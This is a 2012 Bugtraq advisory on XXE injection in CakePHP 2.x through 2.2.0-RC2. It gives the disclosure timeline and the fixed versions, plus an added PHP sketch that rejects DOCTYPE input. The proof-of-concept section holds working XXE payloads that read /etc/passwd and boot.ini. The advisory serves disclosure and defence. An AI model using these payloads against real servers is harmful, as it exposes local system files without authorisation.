CakePHP 2.x-2.2.0-RC2 XXE Injection

Board: Bugtraq, posted 2012/07/17 02:01
# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background

Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."

2. Vulnerability

CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) allows local file inclusion.

3. Proof of Concept

Linux:

<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:

<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>
</request>

4. Fix

Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1

5. Timeline

1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix released
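
For applications that hand request bodies to SimpleXML themselves, one way to refuse entity declarations before SimpleXML sees the document is sketched below. This is an added example, not code from the advisory or from CakePHP; parseUntrustedXml() is a hypothetical helper name and the sample inputs are constructed.

```php
<?php
function parseUntrustedXml(string $xml): SimpleXMLElement
{
    if ($xml === '') {
        throw new InvalidArgumentException('Empty XML body');
    }
    // PHP < 8.0: turn off the libxml external entity loader for this call.
    // PHP 8.0 deprecates the function; libxml >= 2.9 does not load them by default.
    $restore = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
    $prevErrors = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        // LIBXML_NONET blocks network access. LIBXML_NOENT and LIBXML_DTDLOAD
        // are deliberately not passed, so the parser does not substitute entities.
        if (!$dom->loadXML($xml, LIBXML_NONET)) {
            throw new InvalidArgumentException('Malformed XML');
        }
        // Entities can only be declared in a DTD, so refuse any DOCTYPE.
        foreach ($dom->childNodes as $node) {
            if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
                throw new InvalidArgumentException('DOCTYPE not allowed');
            }
        }
        $sx = simplexml_import_dom($dom);
        if (!$sx instanceof SimpleXMLElement) {
            throw new InvalidArgumentException('Could not import document');
        }
        return $sx;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prevErrors);
        if ($restore !== null) {
            libxml_disable_entity_loader($restore);
        }
    }
}
// Constructed sample inputs (the DOCTYPE one declares a harmless internal entity).
$samples = [
    'plain'   => '<request><name>cake</name></request>',
    'doctype' => '<!DOCTYPE request [<!ENTITY e "x">]><request><name>&e;</name></request>',
];
foreach ($samples as $label => $body) {
    try {
        echo $label, ': accepted, name=', parseUntrustedXml($body)->name, "\n";
    } catch (InvalidArgumentException $e) {
        echo $label, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

The DOCTYPE check runs on the parsed document rather than on the raw string, so it does not depend on the encoding or spacing of the declaration.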